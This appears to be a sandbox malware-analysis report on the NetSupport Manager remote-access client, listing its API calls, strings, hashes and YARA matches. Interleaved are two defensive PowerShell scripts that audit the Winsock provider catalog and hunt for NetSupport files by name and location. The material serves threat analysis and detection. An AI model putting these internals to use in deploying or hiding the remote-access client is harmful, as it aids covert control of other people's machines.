                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$FolderPathwsprintf
                                                                                  • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.#v
                                                                                  • API String ID: 1170620360-2953616677
                                                                                  APIs
                                                                                  • _strtok.LIBCMT ref: 11027286
                                                                                  • _strtok.LIBCMT ref: 110272C0
                                                                                  • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strtok$Sleep
                                                                                  • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                  • API String ID: 2009458258-3774545468
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FA067B5), ref: 6F9F8D6B
                                                                                    • Part of subcall function 6F9F4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6F9F8DC8), ref: 6F9F4F78
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6F9F8DCB
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6F9F8DD8
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6F9F8EBF
                                                                                    • Part of subcall function 6F9F4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6F9F4FC4
                                                                                    • Part of subcall function 6F9F4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6F9F8E0D,00000000,?,6F9F8E0D,00000000,?,00000FA0,?), ref: 6F9F4FE4
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6F9F8EAE
                                                                                    • Part of subcall function 6F9F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6F9F5014
                                                                                    • Part of subcall function 6F9F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6F9F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6F9F5034
                                                                                    • Part of subcall function 6F9F2420: _strrchr.LIBCMT ref: 6F9F242E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                  • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                  • API String ID: 2714439535-3484705551
                                                                                  APIs
                                                                                    • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                  • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                  • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                  • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                  • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                  • GetLastError.KERNEL32 ref: 11103831
                                                                                  • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                  • GetLastError.KERNEL32 ref: 1110384F
                                                                                  Strings
                                                                                  • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                  • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                  • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                  • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                  • API String ID: 2036220054-60805735
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                  • GetLastError.KERNEL32 ref: 1115F275
                                                                                  • wsprintfA.USER32 ref: 1115F288
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                  • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                  • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                  • API String ID: 1734919802-1728070458
                                                                                  • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                  • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                  • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                  • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                  • API String ID: 1976012330-1024648535
                                                                                  • Opcode ID: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
                                                                                  • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                  • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                  APIs
                                                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,50D94AA1,00000000,?,00000000), ref: 110613A4
                                                                                  • _malloc.LIBCMT ref: 110613EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,50D94AA1,00000000), ref: 1106142B
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                  • _free.LIBCMT ref: 110614A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                  • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                  • API String ID: 999355418-161875503
                                                                                  • Opcode ID: deeea04e41a9a74f1b849f309be78c31a57b0bfb1de7f61ba93d462eedea79f6
                                                                                  • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                  • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                  APIs
                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,50D94AA1,00000000,?), ref: 1115C927
                                                                                  • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                  • wsprintfW.USER32 ref: 1115C967
                                                                                  • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                  • wsprintfW.USER32 ref: 1115CA27
                                                                                  • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Similarity
                                                                                  • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                  • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                  • API String ID: 3050498177-823534439
                                                                                  • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                  • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                  • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6FA10F2B,7412D4F6,00000000,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?,00000080), ref: 6FA10D48
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6FA10D5B
                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6FA3CB4C,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?,00000080), ref: 6FA10D76
                                                                                  • _malloc.LIBCMT ref: 6FA10D8C
                                                                                    • Part of subcall function 6FA11B69: __FF_MSGBANNER.LIBCMT ref: 6FA11B82
                                                                                    • Part of subcall function 6FA11B69: __NMSG_WRITE.LIBCMT ref: 6FA11B89
                                                                                    • Part of subcall function 6FA11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6FA1D3C1,6FA16E81,00000001,6FA16E81,?,6FA1F447,00000018,6FA37738,0000000C,6FA1F4D7), ref: 6FA11BAE
                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6FA2F278,000000FF,?,6F9FAE0A,?,00000000,?), ref: 6FA10D9F
                                                                                  • _free.LIBCMT ref: 6FA10D84
                                                                                    • Part of subcall function 6FA11BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6FA11C13
                                                                                    • Part of subcall function 6FA11BFD: GetLastError.KERNEL32(00000000), ref: 6FA11C25
                                                                                  • _free.LIBCMT ref: 6FA10DAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                  • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                  • API String ID: 1360380336-1843585929
                                                                                  • Opcode ID: c15417c842e194fff7bc81047b45a37d67b14ecd3adc669fd45cee2eaa01769a
                                                                                  • Instruction ID: 496d75ea77af1b3a237c360763c4706421add4a80a99a8cd4812c43d60221fe4
                                                                                  • Instruction Fuzzy Hash: A201D4B66083016BE630CB70CD85FA776ACAF51B04F15981DF5A5CF280EA79F491C760
                                                                                  APIs
                                                                                    • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                    • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                  • _memset.LIBCMT ref: 11146055
                                                                                  • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                  • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                  • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                  • API String ID: 4251163631-545709139
                                                                                  • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                  • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                  • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1101567A
                                                                                  • _memset.LIBCMT ref: 110156BE
                                                                                  • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                  Strings
                                                                                  • %012d, xrefs: 11015674
                                                                                  • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                  • PackedCatalogItem, xrefs: 110156E2
                                                                                  • NSLSP, xrefs: 11015708
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue_memsetwsprintf
                                                                                  • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                  • API String ID: 1333399081-1346142259
                                                                                  • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                  • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                  • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                  • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
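The record above shows client32 walking the Winsock protocol catalog: it opens `SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries`, builds subkey names with the `%012d` format (entries are named `000000000001`, `000000000002`, ...), reads each `PackedCatalogItem` value, and carries the string `NSLSP`, the name of NetSupport's own layered service provider. A defender can audit the same catalog to see which provider DLLs are registered. The script below is an added example for this page, not code from the sandbox report or from NetSupport; it assumes, as Autoruns-style tooling does, that `PackedCatalogItem` begins with the provider DLL path as a NUL-terminated ANSI string in a 260-byte (MAX_PATH) field, and it flags any provider that is unsigned or lives outside `%SystemRoot%\System32`.

```powershell
# Added example: enumerate Winsock catalog providers and flag unusual ones.
# Assumption: the first 260 bytes of PackedCatalogItem hold the provider DLL path (ANSI, NUL-terminated).
$base = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9'

$results = foreach ($list in 'Catalog_Entries', 'Catalog_Entries64') {
    $key = Join-Path $base $list
    if (-not (Test-Path $key)) { continue }          # Catalog_Entries64 exists only on 64-bit Windows

    foreach ($entry in Get-ChildItem -Path $key) {    # subkeys named with the %012d pattern seen in the record
        $blob = (Get-ItemProperty -Path $entry.PSPath -Name PackedCatalogItem -ErrorAction SilentlyContinue).PackedCatalogItem
        if (-not $blob) { continue }

        $raw      = [System.Text.Encoding]::ASCII.GetString($blob, 0, [Math]::Min(260, $blob.Length))
        $path     = $raw.Split([char]0)[0]            # stop at the first NUL
        $expanded = [Environment]::ExpandEnvironmentVariables($path)   # stored as %SystemRoot%\system32\...

        $sig = if (Test-Path -LiteralPath $expanded) {
            (Get-AuthenticodeSignature -FilePath $expanded).Status
        } else { 'FileMissing' }

        [pscustomobject]@{
            Catalog    = $list
            Entry      = $entry.PSChildName
            Provider   = $path
            Signature  = $sig
            Suspicious = ($sig -ne 'Valid') -or ($expanded -notlike "$env:SystemRoot\system32\*")
        }
    }
}

$results | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Run it from an elevated 64-bit PowerShell so both catalogs are visible. A NetSupport LSP entry is not proof of compromise on its own, since a licensed NetSupport Manager deployment registers the same provider; the question to answer is whether that deployment is sanctioned and whether the DLL path points into the expected install directory.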
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                   • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true (associated dump files as listed under the first client32 entry above)
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 2427920155-3145022300
                                                                                  • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                  • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                  • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                  • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                   • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true (associated dump files as listed under the first client32 entry above)
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                  • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                  • API String ID: 3494822531-1878648853
                                                                                  • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                  • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                  • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                  • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                  APIs
                                                                                  • _calloc.LIBCMT ref: 6FA02FBB
                                                                                  • GetTickCount.KERNEL32 ref: 6FA0300D
                                                                                  • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6FA0301B
                                                                                  • _calloc.LIBCMT ref: 6FA0303B
                                                                                  • _memmove.LIBCMT ref: 6FA03049
                                                                                  • InterlockedDecrement.KERNEL32(-000397B9), ref: 6FA0307F
                                                                                  • SetEvent.KERNEL32(000002EC,?,?,?,?,?,?,?,?,?,?,?,?,?,?,905C34B3), ref: 6FA0308C
                                                                                    • Part of subcall function 6FA028D0: wsprintfA.USER32 ref: 6FA02965
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3178096747-0
                                                                                  • Opcode ID: d828eae940b2303ac413adecd604e015490c1360adacf76dc20f466d83ef12f1
                                                                                  • Instruction ID: 02e7f44b4837edf39fe2207306d0a8959d5e3aa07491c2c392cc6e600045cc9c
                                                                                  • Opcode Fuzzy Hash: d828eae940b2303ac413adecd604e015490c1360adacf76dc20f466d83ef12f1
                                                                                  • Instruction Fuzzy Hash: 874185B6C00308AFDB10DFA9EC45AEFB7F8AF48314F00851AE505E7280E774A645CBA0
                                                                                  APIs
                                                                                  • IsJPIK.PCICHEK(50D94AA1,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                   • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true (associated dump files as listed under the first client32 entry above)
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free_malloc_memsetwsprintf
                                                                                  • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                  • API String ID: 2814900446-469156069
                                                                                  • Opcode ID: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                  • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                  • Opcode Fuzzy Hash: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                  • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
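Two of the records above describe how the client anchors itself on disk. The `..\ctl32\util.cpp` routine compares its own module path (`GetModuleFileNameA`) with `SHGetFolderPathA` for CSIDL 0x26 (CSIDL_PROGRAM_FILES) and 0x1A (CSIDL_APPDATA) and aborts with "wrong nsmdir" if neither matches, and the licence routine calls `IsJPIK` in PCICHEK with `NSM.LIC` and references `iks.lic`, the `_License` section and the `Serial_no` key. Those same artefacts make a compact hunt for NetSupport client installs, with the install directory as the first discriminator: a licensed NetSupport Manager deployment sits under Program Files, whereas a client dropped by a script lands under a user-writable root. The script below is an added example for this page, not the report's or NetSupport's own code; it assumes NSM.LIC is an INI-style text file with a `[_License]` section containing `Serial_no=` (the record supports the section and key names, not the file format) and treats only Program Files as an approved location.

```powershell
# Added example: locate NetSupport client artefacts and report where they live and which licence they carry.
# Assumption: NSM.LIC is INI-style with a [_License] section and a Serial_no key.
$roots    = @("$env:ProgramFiles", "${env:ProgramFiles(x86)}", "$env:APPDATA", "$env:LOCALAPPDATA",
              "$env:ProgramData", "$env:PUBLIC", "$env:TEMP") | Where-Object { $_ -and (Test-Path $_) }
$approved = @("$env:ProgramFiles", "${env:ProgramFiles(x86)}") | Where-Object { $_ }   # CSIDL_PROGRAM_FILES roots
$names    = 'NSM.LIC', 'iks.lic', 'client32.exe', 'PCICHEK.DLL', 'PCICL32.DLL'      # files named in the records

function Get-NsmSerial {
    # Returns the Serial_no value from the [_License] section of an NSM.LIC file, or $null.
    param([string]$LicPath)
    if (-not (Test-Path -LiteralPath $LicPath)) { return $null }
    $inSection = $false
    foreach ($line in Get-Content -LiteralPath $LicPath -ErrorAction SilentlyContinue) {
        if ($line -match '^\s*\[(.+)\]\s*$') { $inSection = ($Matches[1] -ieq '_License'); continue }
        if ($inSection -and $line -match '^\s*serial_no\s*=\s*(.+?)\s*$') { return $Matches[1] }
    }
    return $null
}

$hits = foreach ($root in $roots) {
    Get-ChildItem -Path $root -Recurse -Force -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        $dir  = $file.DirectoryName
        [pscustomobject]@{
            File           = $file.FullName
            Signed         = if ($file.Extension -in '.exe', '.dll') { (Get-AuthenticodeSignature -FilePath $file.FullName).Status } else { 'n/a' }
            Serial_no      = Get-NsmSerial -LicPath (Join-Path $dir 'NSM.LIC')
            InProgramFiles = [bool]($approved | Where-Object { $dir -like "$_\*" })
        }
    }
}

$hits | Sort-Object InProgramFiles, File | Format-Table -AutoSize
```

Rows with `InProgramFiles = False` are the ones to triage first; for rows that are in Program Files, compare `Serial_no` against the licence your organisation actually holds, since the binaries themselves are legitimately signed NetSupport components in both the sanctioned and the abused case.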
